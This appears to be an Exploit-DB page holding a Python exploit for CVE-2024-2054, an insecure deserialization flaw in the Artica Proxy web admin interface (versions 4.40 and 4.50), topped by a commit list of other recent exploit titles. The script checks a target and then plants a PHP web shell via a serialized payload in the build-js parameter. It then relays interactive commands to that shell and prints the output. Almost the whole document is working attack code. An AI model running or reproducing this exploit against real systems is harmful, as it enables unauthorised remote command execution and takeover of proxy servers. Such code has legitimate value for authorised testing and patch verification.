762197db08
10 changes to exploits/shellcodes/ghdb Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS) Artica Proxy 4.50 - Remote Code Execution (RCE) ChurchCRM 5.9.1 - SQL Injection PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) DocsGPT 0.12.0 - Remote Code Execution
78 lines
No EOL
2.4 KiB
Python
Executable file
78 lines
No EOL
2.4 KiB
Python
Executable file
# Exploit Title: CVE-2024-2054 Artica-Proxy administrative web
|
|
application insecure deserialization (RCE)
|
|
# Google Dork:
|
|
# Date: 23-04-2024
|
|
# Exploit Author: Madan
|
|
# Vendor Homepage: https://artica-proxy.com/
|
|
# Version: 4.40, 4.50
|
|
# Tested on: [relevant os]
|
|
# CVE : CVE-2024-2054
|
|
|
|
you can also find the exploit on my github repo:
|
|
https://github.com/Madan301/CVE-2024-2054
|
|
|
|
|
|
import requests
|
|
import base64
|
|
import urllib3
|
|
from colorama import Fore
|
|
|
|
print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
|
|
sometimes vary from how artica proxy interface is hosted")
|
|
|
|
URL = input("Enter url: ")
|
|
if URL[-1]=="/":
|
|
ACTUAL_URL = URL[:-1]
|
|
else:
|
|
ACTUAL_URL = URL
|
|
|
|
ARTICA_URL = ACTUAL_URL
|
|
|
|
def check(ARTICA_URL):
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
try:
|
|
check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
|
|
except Exception as e:
|
|
print(Fore.RED+"Could not reach, check URL")
|
|
if check.status_code==200:
|
|
print(Fore.GREEN+"Vulnerable")
|
|
return True
|
|
else:
|
|
print(Fore.RED+"Not Vulnerable")
|
|
|
|
|
|
def exploit(ARTICA_URL):
|
|
|
|
payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
|
|
payload_data = {
|
|
"TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
|
|
"cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
|
|
"cache_serializer": "json",
|
|
"cache_size": 999999999,
|
|
"cache_data": {
|
|
payload: {
|
|
"cache_date": 0,
|
|
"ttl": 999999999
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
while True:
|
|
PAYLOAD_CMD = input("enter command: ")
|
|
url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
response = requests.get(url, verify=False)
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
if response.status_code == 200:
|
|
cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
|
|
cmd_response = requests.get(cmd_url, verify=False)
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
print(cmd_response.text)
|
|
else:
|
|
print("Failed to execute the payload")
|
|
|
|
check = check(ARTICA_URL=ACTUAL_URL)
|
|
if check==True:
|
|
exploit(ARTICA_URL=ARTICA_URL) |